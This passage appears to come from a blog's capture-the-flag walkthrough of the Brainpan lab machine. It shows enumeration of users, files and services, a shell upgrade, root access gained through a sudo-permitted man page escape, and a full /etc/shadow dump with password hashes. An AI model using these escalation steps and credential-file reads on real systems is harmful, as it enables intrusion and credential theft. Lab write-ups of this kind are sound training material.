anansi tty2 Mon Mar 4 10:58 - 10:58 (00:00)
reynard tty1 Mon Mar 4 10:48 - 13:43 (02:54)
reynard tty1 Mon Mar 4 10:48 - 10:48 (00:00)
# USERS
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
# SEARCH HOME DIRECTORY FILES
ls -lhaR /home/
/home/puck/.wine:
total 816K
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
-rw-rw-r-- 1 puck puck 11 Mar 4 2013 .update-timestamp
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 dosdevices
drwxrwxr-x 5 puck puck 4.0K Mar 4 2013 drive_c
-rw-rw-r-- 1 puck puck 761K Nov 19 08:53 system.reg
-rw-rw-r-- 1 puck puck 26K Nov 19 08:53 user.reg
-rw-rw-r-- 1 puck puck 2.1K Mar 4 2013 userdef.reg
/home/puck/.wine/dosdevices:
total 8.0K
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 ..
lrwxrwxrwx 1 puck puck 10 Mar 4 2013 c: -> ../drive_c
lrwxrwxrwx 1 puck puck 1 Mar 4 2013 z: -> /
/home/puck/.wine/drive_c:
total 20K
drwxrwxr-x 5 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 ..
drwxrwxr-x 4 puck puck 4.0K Mar 4 2013 Program Files
drwxrwxr-x 4 puck puck 4.0K Mar 4 2013 users
drwxrwxr-x 13 puck puck 4.0K Mar 4 2013 windows
/home/puck/.wine/drive_c/Program Files:
total 16K
drwxrwxr-x 4 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 5 puck puck 4.0K Mar 4 2013 ..
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 Common Files
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 Internet Explorer
/home/puck/.wine/drive_c/Program Files/Common Files:
/home/puck/web:
total 816K
drwxrwxr-x 3 puck puck 4.0K Mar 4 2013 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 bin
-rw-rw-r-- 1 puck puck 215 Mar 4 2013 index.html
-rw------- 1 puck puck 797K Mar 4 2013 soss-infographic-final.png
/home/puck/web/bin:
total 32K
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 3 puck puck 4.0K Mar 4 2013 ..
-rwxr-xr-x 1 puck puck 21K Mar 4 2013 brainpan.exe
# What development tools/languages are installed/supported?
which perl
which python
/usr/bin/perl
/usr/bin/python
# How can files be uploaded?
which wget
which nc
which netcat
which scp
which ftp
/usr/bin/wget
/bin/nc
/bin/netcat
/usr/bin/scp
/usr/bin/ftp
# RUNNING PORTS/SERVICES
# Both services running as user 'puck'... not sure that will help me get root....
lsof -i:9999
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
brainpan. 1949 puck 10u IPv4 26008 0t0 TCP *:9999 (LISTEN)
brainpan. 1949 puck 11u IPv4 26008 0t0 TCP *:9999 (LISTEN)
wineserve 1953 puck 27u IPv4 26008 0t0 TCP *:9999 (LISTEN)
lsof -i:10000
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
python 926 puck 3u IPv4 8661 0t0 TCP *:webmin (LISTEN)
# RUNNING SERVICES LOCALLY
netstat -luntp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:9999 0.0.0.0:* LISTEN 1756/brainpan.exe
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN 924/python
udp 0 0 0.0.0.0:39859 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* - what's this port do?
udp6 0 0 :::22091 :::*
# BREAK OUT OF NETCAT SHELL TO BASH SHELL
python -c 'import pty;pty.spawn("/bin/bash")'
puck@brainpan:/home/puck/privesc$ ls
ls
allfiles.tar.gz linux_gather_files.sh linux_privesc_check
linux_checksec.sh linux_priv_esc.sh out
puck@brainpan:/home/puck/privesc$
# CHECK SUDO COMMANDS AVAILABLE
puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util man ls
sudo /home/anansi/bin/anansi_util man ls
'unknown': unknown terminal type.
# RUN SUDO COMMAND TO ENTER MAN PAGES
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual man
MAN(1) Manual pager utils MAN(1)
NAME
man - an interface to the on-line reference manuals
SYNOPSIS
man [-C file] [-d] [-D] [--warnings[=warnings]] [-R encoding] [-L
locale] [-m system[,...]] [-M path] [-S list] [-e extension] [-i|-I]
[--regex|--wildcard] [--names-only] [-a] [-u] [--no-subpages] [-P
pager] [-r prompt] [-7] [-E encoding] [--no-hyphenation] [--no-justifi‐
cation] [-p string] [-t] [-T[device]] [-H[browser]] [-X[dpi]] [-Z]
[[section] page ...] ...
man -k [apropos options] regexp ...
man -K [-w|-W] [-S list] [-i|-I] [--regex] [section] term ...
man -f [whatis options] page ...
man -l [-C file] [-d] [-D] [--warnings[=warnings]] [-R encoding] [-L
locale] [-P pager] [-r prompt] [-7] [-E encoding] [-p string] [-t]
[-T[device]] [-H[browser]] [-X[dpi]] [-Z] file ...
man -w|-W [-C file] [-d] [-D] page ...
man -c [-C file] [-d] [-D] page ...
man [-hV]
DESCRIPTION
Manual page man(1) line 1 (press h for help or q to quit)
DESCRIPTION
man is the system's manual pager. Each page argument given to man is
Manual page man(1) line 2 (press h for help or q to quit)!/bin/bash
# TYPE !/bin/bash TO EXECUTE COMMANDS WITHIN MAN PAGE (WHICH WILL RUN AS "ROOT")
!/bin/bash
root@brainpan:/usr/share/man# whoami
whoami
root
root@brainpan:/usr/share/man#
# GATHER /etc/shadow file
root@brainpan:/usr/share/man# cat /etc/shadow
cat /etc/shadow
root:$6$m20VT7lw$172.XYFP3mb9Fbp/IgxPQJJKDgdOhg34jZD5sxVMIx3dKq.DBwv.mw3HgCmRd0QcN4TCzaUtmx4C5DvZaDioh0:15768:0:99999:7:::
daemon:*:15768:0:99999:7:::
bin:*:15768:0:99999:7:::
sys:*:15768:0:99999:7:::
sync:*:15768:0:99999:7:::
games:*:15768:0:99999:7:::
man:*:15768:0:99999:7:::
lp:*:15768:0:99999:7:::
mail:*:15768:0:99999:7:::
news:*:15768:0:99999:7:::
uucp:*:15768:0:99999:7:::
proxy:*:15768:0:99999:7:::
www-data:*:15768:0:99999:7:::
backup:*:15768:0:99999:7:::
list:*:15768:0:99999:7:::
irc:*:15768:0:99999:7:::
gnats:*:15768:0:99999:7:::
nobody:*:15768:0:99999:7:::
libuuid:!:15768:0:99999:7:::
syslog:*:15768:0:99999:7:::
messagebus:*:15768:0:99999:7:::
reynard:$6$h54J.qxd$yL5md3J4dONwNl.36iA.mkcabQqRMmeZ0VFKxIVpXeNpfK.mvmYpYsx8W0Xq02zH8bqo2K.mkQzz55U2H5kUh1:15768:0:99999:7:::
anansi:$6$hblZftkV$vmZoctRs1nmcdQCk5gjlmcLUb18xvJa3efaU6cpw9hoOXC/kHupYqQ2qz5O.ekVE.SwMfvRnf.QcB1lyDGIPE1:15768:0:99999:7:::
puck:$6$A/mZxJX0$Zmgb3T6SAq.FxO1gEmbIcBF9Oi7q2eAi0TMMqOhg0pjdgDjBr0p2NBpIRqs4OIEZB4op6ueK888lhO7gc.27g1:15768:0:99999:7:::
Subscribe to:
Posts (Atom)